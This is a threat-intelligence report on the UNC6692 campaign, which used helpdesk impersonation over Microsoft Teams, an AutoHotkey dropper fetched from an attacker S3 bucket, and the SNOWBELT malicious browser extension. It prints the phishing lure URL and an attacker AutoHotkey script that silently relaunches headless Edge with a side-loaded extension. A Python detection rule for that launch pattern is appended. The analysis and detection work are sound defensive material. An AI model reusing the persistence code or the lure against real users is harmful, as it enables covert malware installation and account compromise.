Written by: JP Glab, Tufail Ahmed, Josh Kelley, Muhammad Umair
Introduction
Google Threat Intelligence Group (GTIG) identified a multistage intrusion campaign by a newly tracked threat group, UNC6692, that leveraged persistent social engineering, a custom modular malware suite, and deft pivoting inside the victim’s environment to achieve deep network penetration.
As with many other intrusions in recent years, UNC6692 relied heavily on impersonating IT helpdesk employees, convincing their victim to accept a Microsoft Teams chat invitation from an account outside their organization. The UNC6692 campaign demonstrates an interesting evolution in tactics, particularly the use of social engineering, custom malware, and a malicious browser extension, playing on the victim’s inherent trust in several different enterprise software providers.
Threat Details
In late December 2025, UNC6692 conducted a large email campaign designed to overwhelm the target with messages, creating a sense of urgency and distraction. Following this, the attacker sent a phishing message via Microsoft Teams, posing as helpdesk personnel offering assistance with the email volume.
Infection Chain
The victim was contacted through Microsoft Teams and was prompted to click a link to install a local patch that prevents email spamming. Once clicked, the user’s browser opened an HTML page and ultimately downloaded a renamed AutoHotkey binary and an AutoHotkey script with the same name from a threat actor-controlled AWS S3 bucket.
"url": "https://service-page-25144-30466-outlook.s3.us-west-2.amazonaws.com/update.html?email=<redacted>.com",
"description": "Microsoft Spam Filter Updates | Install the local patch to protect your account from email spamming",
Figure 1: Snippet from MS Teams logs
If the AutoHotkey binary is named the same as a script file in its current directory, AutoHotkey will automatically run the script with no additional command line arguments. Evidence of AutoHotkey execution was recorded immediately following the downloads, resulting in initial reconnaissance commands and the installation of SNOWBELT, a malicious Chromium browser extension (not distributed through the Chrome Web Store). Mandiant was unable to recover the initial AutoHotkey script.
The persistence of SNOWBELT was established in multiple ways. First, a shortcut to an AutoHotkey script was added to the Windows Startup folder; the script verified that SNOWBELT was running and that a Scheduled Task was present.
if !CheckHeadlessEdge(){
    try{
        taskService:=ComObject("Schedule.Service")
        taskService.Connect()
        rootFolder:=taskService.GetFolder("\")
        if FindAndRunTask(rootFolder){
            Sleep 10000
            if CheckHeadlessEdge(){
                ExitApp
            }
        }
    }
    Run 'cmd /c start "" "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --user-data-dir="%LOCALAPPDATA%\Microsoft\Edge\System Data" --headless=new --load-extension="%LOCALAPPDATA%\Microsoft\Edge\Extension Data\SysEvents" --no-first-run',,"Hide"
}
ExitApp
Figure 2: Snippet from AutoHotkey script to verify SNOWBELT was running and to start it if not
Second, two additional scheduled tasks were installed: one to start a windowless Microsoft Edge process that loads the SNOWBELT extension, and another to identify and terminate Microsoft Edge processes that do not have CoreUIComponents.dll loaded.
<Exec>
<Command>
"C:\Program Fil
[...]
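A detection sketch for the launch pattern shown in Figure 2, added here as an example (it is not code from GTIG or Mandiant): it parses process-creation command lines and flags a Chromium-based browser started headless with a side-loaded extension, noting a non-default profile directory as supporting context. The sample command lines, the user name alice and all function names are constructed for illustration.

```python
import re

# Chromium switches: --name, --name=value or --name="quoted value"
SWITCH_RE = re.compile(r'--([a-z0-9-]+)(?:=(?:"([^"]*)"|(\S+)))?', re.I)
BROWSERS = ("msedge.exe", "chrome.exe")

# Constructed process-creation command lines (environment variables expanded).
SAMPLE_EVENTS = [
    r'"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --user-data-dir="C:\Users\alice\AppData\Local\Microsoft\Edge\System Data" --headless=new --load-extension="C:\Users\alice\AppData\Local\Microsoft\Edge\Extension Data\SysEvents" --no-first-run',
    r'"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default',
    r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --headless=new --user-data-dir=C:\Temp\ci-profile --remote-debugging-port=9222',
]


def parse_switches(cmdline):
    """Return {switch: value} for every --switch on a Windows command line."""
    return {m.group(1).lower(): (m.group(2) or m.group(3) or "")
            for m in SWITCH_RE.finditer(cmdline)}


def findings(cmdline):
    """List the traits a browser launch shares with the Figure 2 command line."""
    if not any(b in cmdline.lower() for b in BROWSERS):
        return []
    sw = parse_switches(cmdline)
    reasons = []
    if "load-extension" in sw:  # unpacked extension, not installed from a store
        reasons.append("side-loaded extension: " + sw["load-extension"])
    if "headless" in sw:        # no visible window for the user to notice
        reasons.append("headless browser")
    profile = sw.get("user-data-dir", "")
    leaf = profile.rstrip("\\/").replace("/", "\\").rsplit("\\", 1)[-1].lower()
    if profile and leaf != "user data":  # default profile root is ...\User Data
        reasons.append("non-default profile: " + profile)
    return reasons


def is_suspicious(cmdline):
    """Alert only when a browser is both headless and side-loading an extension."""
    sw = parse_switches(cmdline) if findings(cmdline) else {}
    return "headless" in sw and "load-extension" in sw


if __name__ == "__main__":
    for event in SAMPLE_EVENTS:
        print("ALERT" if is_suspicious(event) else "ok   ", findings(event))
```

Headless browsers with temporary profiles are common in test automation, so the third sample is reported with context but does not alert; the combination with a side-loaded extension is what the rule keys on.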